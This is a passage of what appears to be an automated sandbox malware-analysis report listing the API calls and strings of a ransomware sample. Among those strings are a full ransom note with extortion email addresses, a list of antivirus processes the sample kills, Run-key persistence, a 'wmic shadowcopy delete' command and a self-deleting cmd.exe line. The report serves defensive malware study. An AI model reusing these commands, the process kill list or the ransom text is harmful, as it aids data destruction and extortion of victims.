                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,00000004), ref: 00E3ACCE
                                                                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000), ref: 00E3ACE3
                                                                                                      • GetLastError.KERNEL32 ref: 00E3ACED
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 00E3ACFF
                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E3AD2E
                                                                                                      • TerminateProcess.KERNELBASE(00000000,00000001), ref: 00E3AD4F
                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00E3AD56
                                                                                                      • Process32NextW.KERNEL32(?,?), ref: 00E3AD82
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 00E3AD96
                                                                                                      Strings
                                                                                                      • couldn't open process, xrefs: 00E3AD3A
                                                                                                      • SeDebugPrivilege, xrefs: 00E3ACC0
                                                                                                      • ,, xrefs: 00E3AC15
                                                                                                      • avpmapp.exe,econceal.exe,SecHealthUI.exe,RuntimeBroker.exe,escanmon.exe,escanpro.exe,TRAYSSER.EXE,TRAYICOS.EXE,econser.exe,VIEWTCP, xrefs: 00E3AC1F
                                                                                                      • could not set SE_DEBUG_NAME Privilege, xrefs: 00E3AD0C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CloseHandleProcess32$NextOpenToken$AdjustCreateCurrentErrorFirstLastLookupPrivilegePrivilegesSnapshotTerminateToolhelp32Value
                                                                                                      • String ID: ,$SeDebugPrivilege$avpmapp.exe,econceal.exe,SecHealthUI.exe,RuntimeBroker.exe,escanmon.exe,escanpro.exe,TRAYSSER.EXE,TRAYICOS.EXE,econser.exe,VIEWTCP$could not set SE_DEBUG_NAME Privilege$couldn't open process
                                                                                                      • API String ID: 1758721318-2112075363
                                                                                                      • Opcode ID: 379293b7f24b4870ce5297bb47918cda95649573975cbf4d66321633f0f9d921
                                                                                                      • Instruction ID: ec84fd54c9bac1f56b1313ce4ae99529bc7382b95da1b44ebde8dab62c549026
                                                                                                      • Opcode Fuzzy Hash: 379293b7f24b4870ce5297bb47918cda95649573975cbf4d66321633f0f9d921
                                                                                                      • Instruction Fuzzy Hash: AA519371900209DFEB20AF61DC49BAB7BB8FF14304F5451B5E909FA191E7B1DA84CB92

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • __Mtx_unlock.LIBCPMT ref: 00E78584
                                                                                                      • __Mtx_init_in_situ.LIBCPMT ref: 00E785BF
                                                                                                      • BCryptGenRandom.BCRYPT(00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78672
                                                                                                      • BCryptCloseAlgorithmProvider.BCRYPT(?,00000000,00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78690
                                                                                                      • SetLastError.KERNEL32(00000000,00000000), ref: 00E786DE
                                                                                                        • Part of subcall function 00E78020: GetLastError.KERNEL32(AB1AAB9C,?,?), ref: 00E78068
                                                                                                        • Part of subcall function 00E8F18A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00E49A0A,?,00E8C15E,?,00EE3CB4,?,?,?,?,00E49A0A,AllocatorBase: requested size would cause integer overflow,AB1AAB9C), ref: 00E8F1EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptErrorLast$AlgorithmCloseExceptionMtx_init_in_situMtx_unlockProviderRaiseRandom
                                                                                                      • String ID: BCryptGenRandom
                                                                                                      • API String ID: 2882368933-3013187443
                                                                                                      • Opcode ID: c7df5633c92989fac635f7cf8f3ee3590cb2946ba163afcf0bfae183ea95fb84
                                                                                                      • Instruction ID: 60ab21ed4f64ae978e2c4cf4f3b3b552414cd98a286f50cf763989a47dbcdb51
                                                                                                      • Opcode Fuzzy Hash: c7df5633c92989fac635f7cf8f3ee3590cb2946ba163afcf0bfae183ea95fb84
                                                                                                      • Instruction Fuzzy Hash: E35104B1D40348AFDB10EBA4CD4AB9EB7F8EB14714F106169F819BB381EB719904CB61

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • BCryptOpenAlgorithmProvider.BCRYPT(?,RNG,Microsoft Primitive Provider,00000000,AB1AAB9C,00E38EA1), ref: 00E77F1E
                                                                                                      • SetLastError.KERNEL32(00000000,00E38EA1,?,?,?,?,?,?,?,?,?,?,?,00000000,00EB5EAD,000000FF), ref: 00E77F4D
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E77FD2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AlgorithmCryptErrorLastOpenProvider___std_exception_copy
                                                                                                      • String ID: BCryptOpenAlgorithmProvider$Microsoft Primitive Provider$RNG
                                                                                                      • API String ID: 1783600949-2191745741
                                                                                                      • Opcode ID: 41004878eb077279cc7a630e884014adfeb31081eb9e560811feed439864d76b
                                                                                                      • Instruction ID: 8c864433a552a1f86717c90951390d0e411508dd71c622a7ccd24c162a1d1381
                                                                                                      • Opcode Fuzzy Hash: 41004878eb077279cc7a630e884014adfeb31081eb9e560811feed439864d76b
                                                                                                      • Instruction Fuzzy Hash: 62315AB2944709ABC714DF95DC46B9AB7FCFB18710F00562AE81AB3680EBB4A5048B90
                                                                                                      APIs
                                                                                                      • BCryptGenRandom.BCRYPT(00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78672
                                                                                                      • BCryptCloseAlgorithmProvider.BCRYPT(?,00000000,00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78690
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Crypt$AlgorithmCloseProviderRandom
                                                                                                      • String ID:
                                                                                                      • API String ID: 807523545-0
                                                                                                      APIs
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E705CD
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00E3AF10: RegOpenKeyExW.KERNELBASE(80000001,Software\SoftwareClient,00000000,00020019,?), ref: 00E3AF6D
                                                                                                        • Part of subcall function 00E3AF10: RegGetValueA.KERNELBASE(?,00ED385B,?,00000008,00000000,?,?), ref: 00E3AF91
                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,?,AB1AAB9C,00000000), ref: 00E3F40B
                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00E3F6E4
                                                                                                      Strings
                                                                                                      • Contact us, xrefs: 00E3F585
                                                                                                      • All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key., xrefs: 00E3F4F5
                                                                                                      • email :edfr789@tutanota.com, xrefs: 00E3F59D
                                                                                                      • Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover, xrefs: 00E3F525
                                                                                                      • dQ, xrefs: 00E3F5C1
                                                                                                      • dQ, xrefs: 00E3F5D9
                                                                                                      • Don't worry, you can return your files! , xrefs: 00E3F4DD
                                                                                                      • we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned., xrefs: 00E3F53D
                                                                                                      • -> edfr789@tutamail.com, xrefs: 00E3F5B5
                                                                                                      • dQ, xrefs: 00E3F5A9
                                                                                                      • \Decryptfiles.txt, xrefs: 00E3F429
                                                                                                      • UID, xrefs: 00E3F34C
                                                                                                      • dQ, xrefs: 00E3F4E9
                                                                                                      • dQ, xrefs: 00E3F549
                                                                                                      • Attach this file in the email., xrefs: 00E3F5CD
                                                                                                      • dQ, xrefs: 00E3F591
                                                                                                      • ID :, xrefs: 00E3F5E5
                                                                                                      • ATTENTION!, xrefs: 00E3F4BD
                                                                                                      • dQ, xrefs: 00E3F501
                                                                                                      • dQ, xrefs: 00E3F519
                                                                                                      • Private, xrefs: 00E3F367
                                                                                                      • Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours., xrefs: 00E3F56D
                                                                                                      • The only method of recovering files is to purchase a decrypt tool and your key., xrefs: 00E3F50D
                                                                                                      • We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision., xrefs: 00E3F555
                                                                                                      Similarity
                                                                                                      • API ID: Ios_base_dtorOpenPathTempValuestd::ios_base::_
                                                                                                      • String ID: -> edfr789@tutamail.com$ATTENTION!$All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key.$Attach this file in the email.$Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.$Contact us$Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover$Don't worry, you can return your files! $ID :$Private$The only method of recovering files is to purchase a decrypt tool and your key.$UID$We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.$\Decryptfiles.txt$dQ$dQ$dQ$dQ$dQ$dQ$dQ$dQ$email :edfr789@tutanota.com$we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned.
                                                                                                      • API String ID: 1070995017-2794862512

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • IsDebuggerPresent.KERNEL32(AB1AAB9C,0000000F,?), ref: 00E40F83
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E40F90
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E40FA4
                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00020019,?), ref: 00E40FCC
                                                                                                      • Sleep.KERNELBASE(00000064), ref: 00E40FD6
                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,XPSUDTARW,00000000,?,00000000,00000000), ref: 00E40FF5
                                                                                                      • RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00E41010
                                                                                                      • RegSetValueExW.KERNELBASE(00000000,XPSUDTARW,00000000,00000001,?,00000412), ref: 00E41031
                                                                                                      • RegCloseKey.KERNELBASE(00000000), ref: 00E4103D
                                                                                                        • Part of subcall function 00E8BB4C: CloseHandle.KERNEL32(00000000,?,00E4117C,00000000,00000000), ref: 00E8BB52
                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\SoftwareClient,00000000,00020019,00000000), ref: 00E4135F
                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,Private,00000000,?,00000000,00000000), ref: 00E4137F
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E4138F
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E4139D
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E413E0
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E413F0
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E41400
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E41430
                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00E4147C
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E4148E
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E41496
                                                                                                      Similarity
                                                                                                      • API ID: Close$DebuggerPresent$HandleValue$CreateFileModuleNameOpenQuery$ProcessSleep
                                                                                                      • String ID: Private$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\SoftwareClient$XPSUDTARW$cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "%s"
                                                                                                      • API String ID: 2776164779-81697169

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,AB1AAB9C,00000000,?,?,00000000,00EB4143,000000FF,?,AB1AAB9C,00EE4728,Could not create child process), ref: 00E3A212
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00E3A21B
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,?,?,00000000,00EB4143,000000FF,?,AB1AAB9C,00EE4728,Could not create child process,?,?,?,?,00000020), ref: 00E3A229
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00E3A22C
                                                                                                        • Part of subcall function 00E48780: Concurrency::cancel_current_task.LIBCPMT ref: 00E488B3
                                                                                                        • Part of subcall function 00E3AAD0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00E3AB77
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc$Concurrency::cancel_current_taskIos_base_dtorstd::ios_base::_
                                                                                                      • String ID: 0?$0?$0?$0?$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$Could not create child process$CreateProcess failed (%d).$D$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$\..$\Windows\$\system32\$\wbem\$\wmic.exe$c:\$kernel32.dll$shadowcopy delete
                                                                                                      • API String ID: 1382772914-1758836072

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00E337E3
                                                                                                      • GetLastError.KERNEL32 ref: 00E337F2
                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00E33830
                                                                                                      • GetLastError.KERNEL32 ref: 00E33842
                                                                                                      • GetLastError.KERNEL32(?,?,?), ref: 00E338A8
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E338BE
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E338CB
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00E338FA
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E33901
                                                                                                      • SetEvent.KERNEL32(?,AB1AAB9C,75572EE0,?,00000000,00EB31FD,000000FF), ref: 00E33974
                                                                                                      • SetEvent.KERNEL32(@a), ref: 00E3398D
                                                                                                      • SleepEx.KERNEL32(000000FF,00000001), ref: 00E33997
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Event$CloseErrorHandleLast$Create$ObjectSingleSleepWait
                                                                                                      • String ID: @a$thread$thread.entry_event$thread.exit_event
                                                                                                      • API String ID: 301388165-2334419641
                                                                                                      • Opcode ID: 48a65594214b09c191fee8a0857abd33b5a104c59448380762fa99646c72605e
                                                                                                      • Instruction ID: c02c1d003fa7fe8a092e0d2ccb9838258d23d28d6640ba5b0142a10158bd8edc
                                                                                                      • Opcode Fuzzy Hash: 48a65594214b09c191fee8a0857abd33b5a104c59448380762fa99646c72605e
                                                                                                      • Instruction Fuzzy Hash: E4514075E00219EFDB109FA5CC89BAEBBB4EF49710F10425AE915BB390D7B09A44CB90
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E3F310: GetTempPathA.KERNEL32(00000104,?,?,?,?,AB1AAB9C,00000000), ref: 00E3F40B
                                                                                                        • Part of subcall function 00E3F810: SHGetKnownFolderPath.SHELL32(00EBB350,-00000001,-00000001,00000000,AB1AAB9C,?), ref: 00E3F9AC
                                                                                                        • Part of subcall function 00E3F810: CoTaskMemFree.OLE32(00000000,00000000,-00000002), ref: 00E3F9DB
                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 00E3FDC2
                                                                                                      • __Mtx_init_in_situ.LIBCPMT ref: 00E3FDD8
                                                                                                        • Part of subcall function 00E48340: Concurrency::cancel_current_task.LIBCPMT ref: 00E48485
                                                                                                        • Part of subcall function 00E3DF60: GetLastError.KERNEL32(AB1AAB9C,755720D0,00000000,00000000), ref: 00E3DFDB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$Concurrency::cancel_current_taskCopyErrorFileFolderFreeKnownLastMtx_init_in_situTaskTemp
                                                                                                      • String ID: (_$.$Desktop$Documents$Downloads$Pictures$Videos$\Decryptfiles.txt$here
                                                                                                      • API String ID: 877804643-2413492679
                                                                                                      • Opcode ID: a9323b2fcb86750542bf7b27d3ed66707066a5317b8fe98cead8fb6d7ccb6f31
                                                                                                      • Instruction ID: 00f55bbb934326aaba868fc458438d9a201c99132d0413f30905cca484f84f6b
                                                                                                      • Opcode Fuzzy Hash: a9323b2fcb86750542bf7b27d3ed66707066a5317b8fe98cead8fb6d7ccb6f31
                                                                                                      • Instruction Fuzzy Hash: 5EB2A930D44258DAEF24DB64DD89BEEB7B4AF51304F6052D8E009B7292EB786BC4CB51

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00E785F0: BCryptGenRandom.BCRYPT(00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78672
                                                                                                        • Part of subcall function 00E785F0: BCryptCloseAlgorithmProvider.BCRYPT(?,00000000,00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78690
                                                                                                      • RegCreateKeyExW.KERNELBASE(80000001,software\SoftwareClient,00000000,00000000,00000000,000F003F,00000000,?,00000000,-00000078,-00000077,?,?,?,?,?), ref: 00E38741
                                                                                                      • RegSetValueExW.KERNELBASE(?,Public,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00E387A5
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00ED5B38,00000800,00000000), ref: 00E387C9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCrypt$AlgorithmCreateProviderRandomValue
                                                                                                      • String ID: 8[$<- :sizeof key$Error opening key.$Error writing to Registry.$Public$Success opening key.$Success writing to Registry.$software\SoftwareClient
                                                                                                      • API String ID: 2546756072-692627530
                                                                                                      • Opcode ID: aa2dec9890e9dfa944192f58291057766d7da682689c165f65254ffee8ae35f2
                                                                                                      • Instruction ID: 3617937e190247ba029dbc278e03d17123aae21aed1aa4f2112092e386e7b38c
                                                                                                      • Opcode Fuzzy Hash: aa2dec9890e9dfa944192f58291057766d7da682689c165f65254ffee8ae35f2
                                                                                                      • Instruction Fuzzy Hash: 6C125870905258EBDB25DF54CD5ABCEBBF8AB44304F5091D9E4487B281EBB06B88CF61

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3907804496
                                                                                                      • Opcode ID: b15aaac692a0be8de9ee7c6ff2165f2da56f7649318a78b7ed29b21f36113be6
                                                                                                      • Instruction ID: ad0e2d81373be13b71ebe9afe9bcdb84a93e25e9e34756d133df063107d5b63d
                                                                                                      • Opcode Fuzzy Hash: b15aaac692a0be8de9ee7c6ff2165f2da56f7649318a78b7ed29b21f36113be6
                                                                                                      • Instruction Fuzzy Hash: 6DC1D370A08249AFDF11DFA8C981BAE7BF4AF1E304F145199E455BF252CB70AE01CB61

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00EB0632: CreateFileW.KERNELBASE(00000000,?,?,,?,?,00000000,?,00EB0A0D,00000000,0000000C), ref: 00EB064F
                                                                                                      • GetLastError.KERNEL32 ref: 00EB0A78
                                                                                                      • __dosmaperr.LIBCMT ref: 00EB0A7F
                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00EB0A8B
                                                                                                      • GetLastError.KERNEL32 ref: 00EB0A95
                                                                                                      • __dosmaperr.LIBCMT ref: 00EB0A9E
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EB0ABE
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EB0C08
                                                                                                      • GetLastError.KERNEL32 ref: 00EB0C3A
                                                                                                      • __dosmaperr.LIBCMT ref: 00EB0C41
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                      • String ID: H
                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                      • Opcode ID: 9431094f09eca84224b1fa5333fbc8668f6bf1d451ba94955bad72f6ff5ac8f7
                                                                                                      • Instruction ID: 678ad77177a9cbbb45e5190479b9c63a96c04b55226326013440cb7ae6adb884
                                                                                                      • Opcode Fuzzy Hash: 9431094f09eca84224b1fa5333fbc8668f6bf1d451ba94955bad72f6ff5ac8f7
                                                                                                      • Instruction Fuzzy Hash: 8BA13532A141488FDF19EF68D8927EF7BA0AB06328F141259F811BF292C771AD06CB51

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?,AB1AAB9C), ref: 00E3401B
                                                                                                      • SetEvent.KERNEL32(?), ref: 00E34038
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E34053
                                                                                                      • TlsGetValue.KERNEL32(AB1AAB9C), ref: 00E340A2
                                                                                                      • TlsSetValue.KERNEL32(?), ref: 00E340B5
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00E340C5
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 00E3410B
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 00E34132
                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,?), ref: 00E34141
                                                                                                      Memory Dump Source
